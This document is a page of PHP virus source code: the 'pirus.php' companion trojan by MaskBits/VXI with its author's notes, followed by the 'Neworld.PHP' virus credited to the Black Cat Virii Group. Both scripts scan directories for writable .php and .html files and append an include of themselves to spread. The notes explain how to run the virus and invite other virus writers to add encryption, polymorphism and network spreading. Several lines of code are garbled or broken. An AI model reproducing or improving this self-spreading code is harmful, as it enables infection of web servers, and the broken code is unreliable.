while ($file = readdir($handle))
{ $infected=true;

if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($executable = strstr ($file, '.php')) )
if ( is_file($file) && is_writeable($file) )
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'pirus.php');
if(!$sig) $infected=false;
if (($infected==false))
$host = fopen($file, "a");
fputs($host,"<?php ");
fputs($host,"\"); ");
//A sample infected file .. look at the end line .. that's where we are
print "hello";

<?php include("C:\PROGRAM FILES\HTTPD\HTDOCS\WORK\pirus.php"); ?>

The world's first PHP trojan (companion bug .. call it what u want)
By MaskBits/VXI

After being reading about Samhain, I could'nt help noticing the
power of this language. This virus (or call it a companion trojan)
is just intended to be a proof of concept code and is NOT DESIGNED
to be in the wild in any manner. I wanted that other more capable
and brilliant vx authors should look at PHP for their
future projects. This was also needed to keep my spirits up
with DIV (My main vx project) becoming very depressing.

I have only tested on my linux box and omnihttpd

Technical Explanation
First let me tell you how to create enviroment for testing and improving
the bug.

a) For Win 9x/NT/2k users

Please visit and download Omni Httpd Personal
webserver. This has inbuilt PHP 4 support. After installing, use the
included test.php as a trial file and place pirus.php in the same directory.

Now fire up localhost and run the pirus.php, after successful "install"
of the bug .. the test.php should have a line at the end of the file
which reads

<?php include("blah\pirus.php"); ?>

where blah = ur path

b) For Linux users

Well you ppl are born clever . Incase u run into ne problem, seek the
linux spirit inside u or contact me !

The bug itself functions very simple

1. It uses a function like the good old findfirst and findnext to
run thru the files

2. Each file is checked whether it's a file, writable, executable
-- *.php,*.html,*.shtml or whatever crap u come across .. just
nething apart from data (or other untouchable) files --
and whether already infected.

3. The program breaks incase a successful infection takes place.

Possible improvements :
Shell script, encryption, polymorphic like samhain
,network ability, better stealth, appending, good host scripts
which will be downloaded and used by many lame webmasters

We need a php expert ;-) but don't laugh at me


$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;

echo $virt;

$all = opendir('C:\Windows\');
while ($file = readdir($all))
$inf = true;
$exe = false;

if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )

$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;

if ( ($inf=false) )
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, ", ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
// Neworld.PHP Virus - Made By Xmorfic,, Black Cat Virii Group.